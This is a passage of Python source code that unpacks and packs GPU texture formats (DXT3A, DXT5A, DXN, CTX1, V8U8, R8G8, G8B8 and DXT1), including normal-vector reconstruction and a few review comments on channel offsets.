    unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_dxt3a(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel, ucc, scc, array("b", chan_map[: 4]))
    else:
        channels_per_texel = ucc*pixels_per_texel
        pixel_indices = range(pixels_per_texel)
        upscales = tuple(tuple(scale) for scale in upscales)
        #loop through each destination channel
        for dst_chan in range(ucc):
            scale = upscales[dst_chan]
            src_chan = chan_map[dst_chan]
            if src_chan < 0:
                # not reading anything for this destination channel.
                # either leave it full black, or set it to full white.
                if dst_chan == 0:
                    # set alpha to full white
                    for off in range(0, len(unpacked), ucc):
                        unpacked[off] = unpack_max
                continue
            pxl_i = dst_chan
            # each channel's blocks are 2 uint32s wide, interleaved by
            # source channel, so start at 2*src_chan and stride by 2*scc
            for i in range(2 * src_chan, len(packed), 2 * scc):
                alpha = (packed[i+1]<<32) | packed[i]
                for j in pixel_indices:
                    # expand each 4-bit value to 8-bit, then upscale
                    unpacked[pxl_i] = scale[(((alpha>>(j*4)) & 15)*255)//15]
                    pxl_i += ucc
    return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt5a(arby, bitmap_index, width, height, depth=1):
    '''Unpack a DXT5A bitmap (per-channel DXT5-style interpolated blocks).

    Each source channel is stored as an independent stream of 8-byte
    blocks: two 8-bit endpoints plus sixteen 3-bit interpolation indices
    (the DXT5 alpha block format). Returns the unswizzled, upscaled array.
    '''
    packed = arby.texture_block[bitmap_index]
    assert packed.typecode == 'I'
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    scc = arby.source_channel_count
    width, height, depth = ab.clip_dimensions(width, height, depth)
    texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
    pixels_per_texel = (width//texel_width)*(height//texel_height)
    #create a new array to hold the pixels after we unpack them
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_dxt5a(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel, ucc, scc, array("b", chan_map[: 4]))
    else:
        # 8-entry table of interpolated values for the current block
        lookup = [0,0,0,0,0,0,0,0]
        channels_per_texel = ucc*pixels_per_texel
        pixel_indices = range(pixels_per_texel)
        upscales = tuple(tuple(scale) for scale in upscales)
        #loop through each destination channel
        for dst_chan in range(ucc):
            scale = upscales[dst_chan]
            src_chan = chan_map[dst_chan]
            if src_chan < 0:
                # not reading anything for this destination channel.
                # either leave it full black, or set it to full white.
                if dst_chan == 0:
                    # set alpha to full white
                    for off in range(0, len(unpacked), ucc):
                        unpacked[off] = unpack_max
                continue
            pxl_i = dst_chan
            # each channel's blocks are 2 uint32s wide, interleaved by
            # source channel, so start at 2*src_chan and stride by 2*scc
            for i in range(2 * src_chan, len(packed), 2 * scc):
                lookup[0] = val0 = packed[i] & 255
                lookup[1] = val1 = (packed[i] >> 8) & 255
                # 48-bit field of sixteen 3-bit indices
                idx = ((packed[i]>>16) & 65535) | (packed[i+1] << 16)
                # depending on which value is larger
                # the indexing is calculated differently
                if val0 > val1:
                    # 8-value mode: six interpolated steps
                    lookup[2] = (val0*6 + val1)//7
                    lookup[3] = (val0*5 + val1*2)//7
                    lookup[4] = (val0*4 + val1*3)//7
                    lookup[5] = (val0*3 + val1*4)//7
                    lookup[6] = (val0*2 + val1*5)//7
                    lookup[7] = (val0 + val1*6)//7
                else:
                    # 6-value mode: four steps plus explicit 0 and 255
                    lookup[2] = (val0*4 + val1)//5
                    lookup[3] = (val0*3 + val1*2)//5
                    lookup[4] = (val0*2 + val1*3)//5
                    lookup[5] = (val0 + val1*4)//5
                    lookup[6] = 0
                    lookup[7] = 255
                for j in pixel_indices:
                    unpacked[pxl_i] = scale[lookup[(idx >> (j*3))&7]]
                    pxl_i += ucc
    return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxn(arby, bitmap_index, width, height, depth=1):
    '''Unpack a DXN (BC5/3Dc) two-channel normal-map bitmap.

    Each 16-byte texel holds two DXT5-style interpolated blocks, one for
    the green (Y) and one for the red (X) component. The blue (Z)
    component is reconstructed so the vector is unit length, and the
    X/Y components are renormalized when they overshoot. Returns the
    unswizzled, upscaled channel array.
    '''
    packed = arby.texture_block[bitmap_index]
    assert packed.typecode == 'I'
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    # 0x80 is the unsigned midpoint used as the vector zero point
    zero_point = sign_mask = 0x80
    mask = sign_mask - 1
    mask_sq = mask**2
    ucc = arby.unpacked_channel_count
    width, height, depth = ab.clip_dimensions(width, height, depth)
    texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
    pixels_per_texel = (width//texel_width)*(height//texel_height)
    channels_per_texel = ucc*pixels_per_texel
    #create a new array to hold the pixels after we unpack them
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_dxn(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel, ucc, array("b", chan_map[: 4]))
    else:
        # convert to tuples for faster access
        upscales = tuple(tuple(scale) for scale in upscales)
        pixel_indices = range(pixels_per_texel)
        # 8-entry interpolation tables for each component
        r_lookup = [0,0,0,0,0,0,0,0]
        g_lookup = [0,0,0,0,0,0,0,0]
        #loop through each texel (4 uint32s per texel)
        for i in range(len(packed)//4):
            pxl_i = i*channels_per_texel
            j = i*4
            g_lookup[0] = g0 = packed[j]&255
            g_lookup[1] = g1 = (packed[j]>>8)&255
            g_idx = ((packed[j]>>16)&65535) + (packed[j+1]<<16)
            r_lookup[0] = r0 = packed[j+2]&255
            r_lookup[1] = r1 = (packed[j+2]>>8)&255
            r_idx = ((packed[j+2]>>16)&65535) + (packed[j+3]<<16)
            #depending on which alpha value is larger
            #the indexing is calculated differently
            if g0 > g1:
                g_lookup[2] = (g0*6 + g1  )//7
                g_lookup[3] = (g0*5 + g1*2)//7
                g_lookup[4] = (g0*4 + g1*3)//7
                g_lookup[5] = (g0*3 + g1*4)//7
                g_lookup[6] = (g0*2 + g1*5)//7
                g_lookup[7] = (g0   + g1*6)//7
            else:
                g_lookup[2] = (g0*4 + g1  )//5
                g_lookup[3] = (g0*3 + g1*2)//5
                g_lookup[4] = (g0*2 + g1*3)//5
                g_lookup[5] = (g0   + g1*4)//5
                g_lookup[6] = 0
                g_lookup[7] = 255
            if r0 > r1:
                r_lookup[2] = (r0*6 + r1  )//7
                r_lookup[3] = (r0*5 + r1*2)//7
                r_lookup[4] = (r0*4 + r1*3)//7
                r_lookup[5] = (r0*3 + r1*4)//7
                r_lookup[6] = (r0*2 + r1*5)//7
                r_lookup[7] = (r0   + r1*6)//7
            else:
                r_lookup[2] = (r0*4 + r1  )//5
                r_lookup[3] = (r0*3 + r1*2)//5
                r_lookup[4] = (r0*2 + r1*3)//5
                r_lookup[5] = (r0   + r1*4)//5
                r_lookup[6] = 0
                r_lookup[7] = 255
            for k in pixel_indices:
                g = y = g_lookup[(g_idx>>(k*3))&7]
                r = x = r_lookup[(r_idx>>(k*3))&7]
                off = k*ucc + pxl_i
                # we're normalizing the coordinates
                # here, not just unpacking them
                # fold the biased values into distances from the zero point
                x = r&mask if r&sign_mask else zero_point - r
                y = g&mask if g&sign_mask else zero_point - g
                d = mask_sq - x**2 - y**2
                if d > 0:
                    # reconstruct z so x^2 + y^2 + z^2 == mask_sq
                    b = int(sqrt(d)) + zero_point
                else:
                    # vector overshoots unit length: clamp z and
                    # scale x/y back onto the unit circle
                    b = zero_point
                    n_len = sqrt(mask_sq - d)/mask
                    x = int(x/n_len)
                    y = int(y/n_len)
                # re-bias back into unsigned range, preserving sign
                r = x + zero_point if r&sign_mask else zero_point - x
                g = y + zero_point if g&sign_mask else zero_point - y
                color = [0, r, g, b]
                dst_chan = 0
                for src_chan in chan_map:
                    if src_chan <= 0 or dst_chan == 0:
                        # set alpha to full white
                        # NOTE(review): this writes unpacked[off] (the alpha
                        # slot) even when dst_chan != 0, whereas unpack_ctx1
                        # writes unpacked[off + dst_chan] here — confirm
                        # which is intended.
                        unpacked[off] = unpack_max
                    elif src_chan >= 0:
                        unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
                    dst_chan += 1
    return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_ctx1(arby, bitmap_index, width, height, depth=1):
    '''Unpack a CTX1 compressed normal-map bitmap.

    Each 8-byte texel holds two 8:8 X/Y endpoint pairs and sixteen 2-bit
    palette indices. Z is reconstructed per endpoint to unit length
    (renormalizing X/Y on overshoot), then two intermediate colors are
    interpolated DXT1-style. Returns the unswizzled, upscaled array.
    '''
    packed = arby.texture_block[bitmap_index]
    assert packed.typecode == 'I'
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    # 0x80 is the unsigned midpoint used as the vector zero point
    zero_point = sign_mask = 0x80
    mask = sign_mask - 1
    mask_sq = mask**2
    ucc = arby.unpacked_channel_count
    width, height, depth = ab.clip_dimensions(width, height, depth)
    texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
    pixels_per_texel = (width//texel_width)*(height//texel_height)
    channels_per_texel = ucc*pixels_per_texel
    pixel_indices = range(pixels_per_texel)
    #create a new array to hold the pixels after we unpack them
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_ctx1(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel, ucc, array("b", chan_map[: 4]))
    else:
        #create the arrays to hold the color channel data
        # layout is [a, r, g, b]
        c_0 = [0,0,0,0]
        c_1 = [0,0,0,0]
        c_2 = [0,0,0,0]
        c_3 = [0,0,0,0]
        #stores the colors in a way we can easily access them
        colors = [c_0, c_1, c_2, c_3]
        # convert to tuples for faster access
        upscales = tuple(tuple(scale) for scale in upscales)
        #loop through each texel (2 uint32s per texel)
        for i in range(len(packed)//2):
            j = i*2
            pxl_i = i*channels_per_texel
            values = packed[j]
            idx = packed[j+1]
            # unpack the colors
            c_0[1] = x0 = r0 = (values) & 255
            c_0[2] = y0 = g0 = (values>>8) & 255
            c_1[1] = x1 = r1 = (values>>16) & 255
            c_1[2] = y1 = g1 = (values>>24) & 255
            #calculate the z-components
            # we're normalizing the coordinates here, not just unpacking them
            # fold the biased values into distances from the zero point
            x0 = x0&mask if x0&sign_mask else zero_point - x0
            y0 = y0&mask if y0&sign_mask else zero_point - y0
            x1 = x1&mask if x1&sign_mask else zero_point - x1
            y1 = y1&mask if y1&sign_mask else zero_point - y1
            d = mask_sq - x0**2 - y0**2
            if d > 0:
                # reconstruct z0 so the endpoint is unit length
                b0 = int(sqrt(d)) + zero_point
            else:
                # overshoot: clamp z0 and scale x0/y0 back in range
                b0 = zero_point
                n_len = sqrt(mask_sq - d)/mask
                x0 = int(x0/n_len)
                y0 = int(y0/n_len)
            # re-bias back into unsigned range, preserving sign
            r0 = x0 + zero_point if r0&sign_mask else zero_point - x0
            g0 = y0 + zero_point if g0&sign_mask else zero_point - y0
            d = mask_sq - x1**2 - y1**2
            if d > 0:
                # reconstruct z1 so the endpoint is unit length
                b1 = int(sqrt(d)) + zero_point
            else:
                # overshoot: clamp z1 and scale x1/y1 back in range
                b1 = zero_point
                n_len = sqrt(mask_sq - d)/mask
                x1 = int(x1/n_len)
                y1 = int(y1/n_len)
            r1 = x1 + zero_point if r1&sign_mask else zero_point - x1
            g1 = y1 + zero_point if g1&sign_mask else zero_point - y1
            # store the normalized colors
            c_0[1] = r0; c_1[1] = r1
            c_0[2] = g0; c_1[2] = g1
            c_0[3] = b0; c_1[3] = b1
            # calculate the in-between colors
            c_2[1] = (c_0[1]*2 + c_1[1])//3
            c_2[2] = (c_0[2]*2 + c_1[2])//3
            c_2[3] = (c_0[3]*2 + c_1[3])//3
            c_3[1] = (c_0[1] + c_1[1]*2)//3
            c_3[2] = (c_0[2] + c_1[2]*2)//3
            c_3[3] = (c_0[3] + c_1[3]*2)//3
            for k in pixel_indices:
                # 2-bit palette index selects one of the four colors
                color = colors[(idx >> (k*2))&3]
                off = k*ucc + pxl_i
                dst_chan = 0
                for src_chan in chan_map:
                    if src_chan <= 0 or dst_chan == 0:
                        # set alpha to full white
                        unpacked[off + dst_chan] = unpack_max
                    elif src_chan >= 0:
                        unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
                    dst_chan += 1
    return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_v8u8(arby, bitmap_index, width, height, depth=1):
    '''Unpack a V8U8 bitmap (8 bits per signed component).'''
    return unpack_vu(arby, bitmap_index, width, height, depth, bpc=8)
def unpack_v16u16(arby, bitmap_index, width, height, depth=1):
    '''Unpack a V16U16 bitmap (16 bits per signed component).'''
    return unpack_vu(arby, bitmap_index, width, height, depth, bpc=16)
def unpack_vu(arby, bitmap_index, width, height, depth=1, bpc=8):
    '''Unpack a signed two-component (V/U) normal-map bitmap.

    Decodes the signed U/V pair from each packed pixel, reconstructs the
    W component so the vector is unit length (renormalizing U/V on
    overshoot), and returns the unpacked, upscaled channel array.
    bpc is the bit count of each signed component (8 or 16).
    '''
    packed = arby.texture_block[bitmap_index]
    #create a new array to hold the pixels after we unpack them
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    bytes_per_pixel = unpack_size*ucc
    unpacked = ab.bitmap_io.make_array(
        unpack_code, width*height, bytes_per_pixel)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path returns early
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_vu(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            ucc, array("b", chan_map[: 4]))
        return unpacked
    sign_mask = 1 << (bpc - 1)  # == 128 for 8bpc
    chan_mask = (1 << bpc) - 1  # == 255 for 8bpc
    dist_max = (sign_mask - 1)  # == 127 for 8bpc
    dist_max_sq = dist_max**2   # == 16129 for 8bpc
    # convert to tuples for faster access
    upscales = tuple(tuple(scale) for scale in upscales)
    for i in range(0, len(packed)):
        # RGB normal maps use unsigned chars, which maps to:
        #     [0, 255] -> [-1, 1]
        # V8U8 uses signed chars, which maps(as unsigned chars) to:
        #     [0, 127] -> [+0, 1]  and  [128, 255] -> [-1, -0]
        # Ones compliment is used here to simplify math and to allow
        # all components to have a zero point and to make both sides
        # of the zero point have an equal numbers of points.
        off = ucc*i
        # low bpc bits are U, next bpc bits are V
        u = packed[i]&chan_mask
        v = (packed[i]>>bpc)&chan_mask
        # sign-extend via ones complement
        if u&sign_mask: u -= chan_mask
        if v&sign_mask: v -= chan_mask
        # we're normalizing the coordinates here, not just unpacking them
        d = dist_max_sq - u**2 - v**2
        if d > 0:
            # reconstruct w so u^2 + v^2 + w^2 == dist_max_sq
            w = int(sqrt(d))
        else:
            # overshoot: scale u/v back onto the unit circle, w = 0
            n_len = sqrt(dist_max_sq - d)/dist_max
            u = int(u/n_len)
            v = int(v/n_len)
            w = 0
        # re-bias signed components into unsigned range; slot 0 is alpha
        colors = [0, u + sign_mask, v + sign_mask, w + sign_mask]
        dst_chan = 0
        for src_chan in chan_map:
            if src_chan < 0 and dst_chan == 0:
                # alpha and not reading alpha. set to full white
                unpacked[off] = unpack_max
            elif src_chan >= 0:
                unpacked[off + dst_chan] = upscales[dst_chan][colors[src_chan]]
            dst_chan += 1
    return unpacked
def unpack_r8g8(arby, bitmap_index, width, height, depth=1):
    '''Unpack an R8G8 bitmap (8 bits per component).'''
    return unpack_rg(arby, bitmap_index, width, height, depth, bpc=8)
def unpack_r16g16(arby, bitmap_index, width, height, depth=1):
    '''Unpack an R16G16 bitmap (16 bits per component).'''
    return unpack_rg(arby, bitmap_index, width, height, depth, bpc=16)
def unpack_rg(arby, bitmap_index, width, height, depth=1, bpc=8):
    '''Unpack a two-component R/G normal-map bitmap.

    Decodes the biased R/G pair from each packed pixel, reconstructs the
    B (W) component so the vector is unit length (renormalizing on
    overshoot), and returns the unpacked, upscaled channel array.
    bpc is the bit count of each component (8 or 16).
    '''
    packed = arby.texture_block[bitmap_index]
    #create a new array to hold the pixels after we unpack them
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    bytes_per_pixel = unpack_size*ucc
    unpacked = ab.bitmap_io.make_array(
        unpack_code, width*height, bytes_per_pixel)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if False and fast_dds_defs:
        # NOT IMPLEMENTED YET (deliberately disabled accelerated path)
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_gr(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            ucc, array("b", chan_map[: 4]))
        return unpacked
    sign_mask = 1 << (bpc - 1)  # == 128 for 8bpc
    chan_mask = (1 << bpc) - 1  # == 255 for 8bpc
    dist_max = (sign_mask - 1)  # == 127 for 8bpc
    dist_max_sq = dist_max**2   # == 16129 for 8bpc
    # convert to tuples for faster access
    upscales = tuple(tuple(scale) for scale in upscales)
    for i in range(0, len(packed)):
        off = ucc*i
        # high bpc bits are the first component, low bits the second;
        # subtract dist_max to center around zero
        u = ((packed[i]>>bpc)&chan_mask) - dist_max
        v = (packed[i]&chan_mask) - dist_max
        # shift negatives by one so both sides of zero are symmetric
        if u < 0: u += 1
        if v < 0: v += 1
        # we're normalizing the coordinates here, not just unpacking them
        d = dist_max_sq - u**2 - v**2
        if d > 0:
            # reconstruct w so u^2 + v^2 + w^2 == dist_max_sq
            w = int(sqrt(d))
        else:
            # overshoot: scale u/v back onto the unit circle, w = 0
            n_len = sqrt(dist_max_sq - d)/dist_max
            u = int(u/n_len)
            v = int(v/n_len)
            w = 0
        # re-bias components into unsigned range; slot 0 is alpha
        colors = [0, u + sign_mask, v + sign_mask, w + sign_mask]
        dst_chan = 0
        for src_chan in chan_map:
            if src_chan < 0 and dst_chan == 0:
                # alpha and not reading alpha. set to full white
                unpacked[off] = unpack_max
            elif src_chan >= 0:
                unpacked[off + dst_chan] = upscales[dst_chan][colors[src_chan]]
            dst_chan += 1
    return unpacked
def unpack_g8b8(arby, bitmap_index, width, height, depth=1):
    '''Unpack a G8B8 bitmap (8 bits per component).'''
    return unpack_gb(arby, bitmap_index, width, height, depth, bpc=8)
def unpack_g16b16(arby, bitmap_index, width, height, depth=1):
    '''Unpack a G16B16 bitmap (16 bits per component).'''
    return unpack_gb(arby, bitmap_index, width, height, depth, bpc=16)
def unpack_gb(arby, bitmap_index, width, height, depth=1, bpc=8):
    '''Unpack a two-component G/B normal-map bitmap.

    Decodes the biased G/B pair from each packed pixel, reconstructs the
    first (R/U) component so the vector is unit length (renormalizing on
    overshoot), and returns the unpacked, upscaled channel array.
    bpc is the bit count of each component (8 or 16).
    '''
    packed = arby.texture_block[bitmap_index]
    #create a new array to hold the pixels after we unpack them
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    bytes_per_pixel = unpack_size*ucc
    unpacked = ab.bitmap_io.make_array(
        unpack_code, width*height, bytes_per_pixel)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if False and fast_dds_defs:
        # NOT IMPLEMENTED YET (deliberately disabled accelerated path)
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_gb(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            ucc, array("b", chan_map[: 4]))
        return unpacked
    sign_mask = 1 << (bpc - 1)  # == 128 for 8bpc
    chan_mask = (1 << bpc) - 1  # == 255 for 8bpc
    dist_max = (sign_mask - 1)  # == 127 for 8bpc
    dist_max_sq = dist_max**2   # == 16129 for 8bpc
    # convert to tuples for faster access
    upscales = tuple(tuple(scale) for scale in upscales)
    for i in range(0, len(packed)):
        off = ucc*i
        # high bpc bits are V, low bits are W;
        # subtract dist_max to center around zero
        v = ((packed[i]>>bpc)&chan_mask) - dist_max
        w = (packed[i]&chan_mask) - dist_max
        # shift negatives by one so both sides of zero are symmetric
        if v < 0: v += 1
        if w < 0: w += 1
        # we're normalizing the coordinates here, not just unpacking them
        d = dist_max_sq - v**2 - w**2
        if d > 0:
            # reconstruct u so u^2 + v^2 + w^2 == dist_max_sq
            u = int(sqrt(d))
        else:
            # overshoot: scale v/w back onto the unit circle, u = 0
            n_len = sqrt(dist_max_sq - d)/dist_max
            v = int(v/n_len)
            w = int(w/n_len)
            u = 0
        # re-bias components into unsigned range; slot 0 is alpha
        colors = [0, u + sign_mask, v + sign_mask, w + sign_mask]
        dst_chan = 0
        for src_chan in chan_map:
            if src_chan < 0 and dst_chan == 0:
                # alpha and not reading alpha. set to full white
                unpacked[off] = unpack_max
            elif src_chan >= 0:
                unpacked[off + dst_chan] = upscales[dst_chan][colors[src_chan]]
            dst_chan += 1
    return unpacked
########################################
'''######## PACKING ROUTINES ########'''
########################################
def pack_dxt1(arby, unpacked, width, height, depth=1):
    '''Pack an unpacked channel array into DXT1/BC1 compressed texels.

    For each 4x4 texel: picks the two most distant pixel colors as the
    565 endpoints, optionally enables 3-color (color-key transparency)
    mode when any pixel's alpha falls below the one-bit bias, then
    assigns each pixel the 2-bit index of its nearest palette color.
    Returns the packed uint32 array.

    NOTE(review): the per-channel offsets (pxl_i+1/+2/+3) and the i>>1
    index shift assume ucc == 4 (ARGB layout) — confirm against callers.
    '''
    ucc, bpt = arby.unpacked_channel_count, 8  # 8 bytes per texel
    width, height, depth = ab.clip_dimensions(width, height, depth)
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
    pixels_per_texel = get_texel_pixel_count(width, height)
    channels_per_texel = ucc*pixels_per_texel
    can_have_alpha = arby.color_key_transparency
    a_cutoff = arby.one_bit_bias
    _, r_scale, g_scale, b_scale = arby.channel_downscalers
    repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
    # reorder row-major pixels into texel order before packing
    unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
    if fast_dds_defs:
        # accelerated C-extension path
        dds_defs_ext.pack_dxt1(
            repacked, unpacked, r_scale, g_scale, b_scale,
            pixels_per_texel, can_have_alpha, a_cutoff)
        return repacked
    #this is the indexing for each pixel in each texel
    #values are multiplied by 4 to account for the channels
    pixel_indices = range(0, channels_per_texel, ucc)
    make_alpha = False
    c_2 = [0,0,0,0]
    c_3 = [0,0,0,0]
    #shorthand names
    rpa = repacked
    upa = unpacked
    # convert to tuples for faster access
    r_scale, g_scale, b_scale = tuple(r_scale), tuple(g_scale), tuple(b_scale)
    #loop for each texel (2 uint32s of output per texel)
    for txl_i in range(0, len(repacked), 2):
        dist0 = dist1 = c_0i = c_1i = idx = 0
        pxl_i = (txl_i//2)*channels_per_texel
        r_pxl_i = pxl_i + 1
        g_pxl_i = pxl_i + 2
        b_pxl_i = pxl_i + 3
        # compare distance between all pixels and find the two furthest apart
        # (we are actually comparing the area of the distance as it's faster)
        for i in pixel_indices:
            r = upa[r_pxl_i + i]
            g = upa[g_pxl_i + i]
            b = upa[b_pxl_i + i]
            for j in pixel_indices:
                if j <= i: continue
                dist1 = ((r - upa[r_pxl_i + j])**2+
                         (g - upa[g_pxl_i + j])**2+
                         (b - upa[b_pxl_i + j])**2)
                if dist1 > dist0:
                    dist0 = dist1
                    c_0i = i
                    c_1i = j
        # store furthest apart colors for use
        c_0 = upa[pxl_i + c_0i: pxl_i + c_0i + 4]
        c_1 = upa[pxl_i + c_1i: pxl_i + c_1i + 4]
        # quantize the colors down to 16 bit color and repack
        color0 = ((((r_scale[c_0[1]]*31+15)//255)<<11) |
                  (((g_scale[c_0[2]]*63+31)//255)<<5) |
                  (b_scale[c_0[3]]*31+15)//255)
        color1 = ((((r_scale[c_1[1]]*31+15)//255)<<11) |
                  (((g_scale[c_1[2]]*63+31)//255)<<5) |
                  (b_scale[c_1[3]]*31+15)//255)
        # figure out if we are using color key transparency for this pixel
        #by seeing if any of the alpha values are below the cutoff bias
        if can_have_alpha:
            make_alpha = False
            for i in pixel_indices:
                if upa[pxl_i+i] < a_cutoff:
                    make_alpha = True
                    break
        if color0 == color1 and not make_alpha:
            # solid-color texel: indices stay zero
            rpa[txl_i] = (color1<<16) | color0
            continue
        # if the current color selection doesn't match what we want then
        # we reverse which color is which (if we are using transparency then
        # the first color as an integer must be smaller or equal to the second)
        if make_alpha == (color0 > color1):
            c_0, c_1 = c_1, c_0
            rpa[txl_i] = (color0<<16) | color1
        else:
            rpa[txl_i] = (color1<<16) | color0
        # calculate the intermediate colors
        #If the target format is DXT2/3/4/5 then no CK transparency is used.
        #CK mode will only be selected if both colors are the same.
        #If both colors are the same then it is fine to run non-CK
        #calculation on it since it will default to index zero.
        #That is why the DXT3/5 calculation is in this part only
        if rpa[txl_i]&65535 > rpa[txl_i]>>16:
            # 4-color mode: two interpolated intermediates
            c_2[1] = (c_0[1]*2 + c_1[1])//3
            c_2[2] = (c_0[2]*2 + c_1[2])//3
            c_2[3] = (c_0[3]*2 + c_1[3])//3
            c_3[1] = (c_0[1] + c_1[1]*2)//3
            c_3[2] = (c_0[2] + c_1[2]*2)//3
            c_3[3] = (c_0[3] + c_1[3]*2)//3
            # calculate each pixel's closest match
            # and assign it the proper index
            for i in pixel_indices:
                r = upa[r_pxl_i+i]
                g = upa[g_pxl_i+i]
                b = upa[b_pxl_i+i]
                dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
                         (r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
                         (r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2,
                         (r-c_3[1])**2 + (g-c_3[2])**2 + (b-c_3[3])**2)
                # i>>1 == 2*pixel_index when ucc == 4
                idx += dists.index(min(dists))<<(i>>1)
            rpa[txl_i+1] = idx
            continue
        # 3-color (color-key) mode: single midpoint color
        c_2[1] = (c_0[1]+c_1[1])//2
        c_2[2] = (c_0[2]+c_1[2])//2
        c_2[3] = (c_0[3]+c_1[3])//2
        #here, c_3 represents zero color and fully transparent
        #calculate each pixel's closest match and assign it the proper index
        for i in pixel_indices:
            if upa[pxl_i+i] < a_cutoff:
                # below the alpha cutoff: use the transparent index
                idx += 3<<(i>>1)
                continue
            r = upa[r_pxl_i+i]
            g = upa[g_pxl_i+i]
            b = upa[b_pxl_i+i]
            dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
                     (r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
                     (r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2)
            idx += dists.index(min(dists))<<(i>>1)
        rpa[txl_i+1] = idx
    return repacked
def pack_dxt2_3(arby, unpacked, width, height, depth=1):
